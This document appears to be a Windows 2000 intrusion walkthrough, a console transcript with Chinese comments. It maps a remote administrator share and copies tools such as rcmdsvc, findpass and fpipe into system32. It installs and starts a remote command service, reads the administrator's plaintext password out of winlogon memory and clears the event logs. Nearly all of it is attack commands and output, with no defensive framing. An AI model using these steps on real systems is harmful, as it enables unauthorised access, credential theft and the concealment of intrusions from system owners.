c:\>net use z: \\xxx.xxx.xxx.xxx "password" /user:"administrator"

c:\>copy rcmdsvc.exe z:\winnt\system32
c:\>copy pulist.exe z:\winnt\system32
c:\>copy findpass.exe z:\winnt\system32
c:\>copy kill.exe z:\winnt\system32
c:\>copy clearel.exe z:\winnt\system32
c:\>copy clealog.cmd z:\winnt\system32
c:\>copy fpipe.exe z:\winnt\system32
c:\>copy msvcp60.dll z:\winnt\system32

c:\>sc \\xxx.xxx.xxx.xxx create "Remote Command Service" binpath= 
c:\winnt\system32\rcmdsvc.exe type= own start= auto

c:\>sc \\xxx.xxx.xxx.xxx start "Remote Command Service"

SERVICE_NAME: rpc support services
TYPE : 10 WIN32_OWN_PROCESS
STATE : 2 START_PENDING
(NOT_STOPPABLE,NOT_PAUSABLE,
IGNORES_SHUTDOWN)
WIN32_EXIT_CODE : 0 (0x0)
SERVICE_EXIT_CODE : 0 (0x0)
CHECKPOINT : 0x0
WAIT_HINT : 0x7d0

/*在這里我們用sc啟動剛才創建的Remote Command Service服務。*/ 

/*下面連上對方服務器*/

c:\>rcmd

Enter Server Name : xxx.xxx.xxx.xxx
Connect to \\xxx.xxx.xxx.xxx

Microsoft Windows 2000 [Version 5.00.2195]
(C) Copyright 1985-1999 Microsoft Corp.

C:\Documents and Settings\Default User.WINNT>pulist

Process PID User
Idle 0
System 8
smss.exe 168 NT AUTHORITY\SYSTEM
csrss.exe 192 NT AUTHORITY\SYSTEM
winlogon.exe 212 NT AUTHORITY\SYSTEM
services.exe 240 NT AUTHORITY\SYSTEM
lsass.exe 252 NT AUTHORITY\SYSTEM
svchost.exe 408 NT AUTHORITY\SYSTEM
spoolsv.exe 436 NT AUTHORITY\SYSTEM
msdtc.exe 464 NT AUTHORITY\SYSTEM
svchost.exe 596 NT AUTHORITY\SYSTEM
llssrv.exe 624 NT AUTHORITY\SYSTEM
regsvc.exe 676 NT AUTHORITY\SYSTEM
rpcsvc.exe 692 NT AUTHORITY\SYSTEM
mstask.exe 716 NT AUTHORITY\SYSTEM
LSESS.EXE 792 NT AUTHORITY\SYSTEM
tlntsvr.exe 832 NT AUTHORITY\SYSTEM
VrUpSvr.exe 956 NT AUTHORITY\SYSTEM
winmgmt.exe 968 NT AUTHORITY\SYSTEM
dns.exe 980 NT AUTHORITY\SYSTEM
dfssvc.exe 1064 NT AUTHORITY\SYSTEM
POP3S.exe 1100 NT AUTHORITY\SYSTEM
smtpds.exe 1120 NT AUTHORITY\SYSTEM
svchost.exe 1384 NT AUTHORITY\SYSTEM
dllhost.exe 1316 NT AUTHORITY\SYSTEM
internat.exe 1308 SERVER\Administrator
conime.exe 1680 SERVER\Administrator
VRMONSVC.EXE 872 NT AUTHORITY\SYSTEM
inetinfo.exe 1456 NT AUTHORITY\SYSTEM
explorer.exe 1548 SERVER\Administrator
cmd.exe 1712 SERVER\Guest
pulist.exe 532 SERVER\Guest

/*我們可以看到winlogon.exe的進程號是212*/

C:\Documents and Settings\Default User.WINNT>findpass server 
administrator 212

To Find Password in the Winlogon process
Usage: fidp DomainName UserName PID-of-WinLogon

The debug privilege has been added to PasswordReminder.
The WinLogon process id is 214 (0x000000d6).
To find server\administrator password in process 214 ...
The encoded password is found at 0x01a00800 and has a length of 3.
The logon information is: server/administrator/Tgrh87fd.
The hash byte is: 0xb8.

/*在winlogon中查找administrator的名文口令*/

C:\Documents and Settings\Default User.WINNT>clealog
clealog done

/*清除日志記錄*/

C:\Documents and Settings\Default User.WINNT>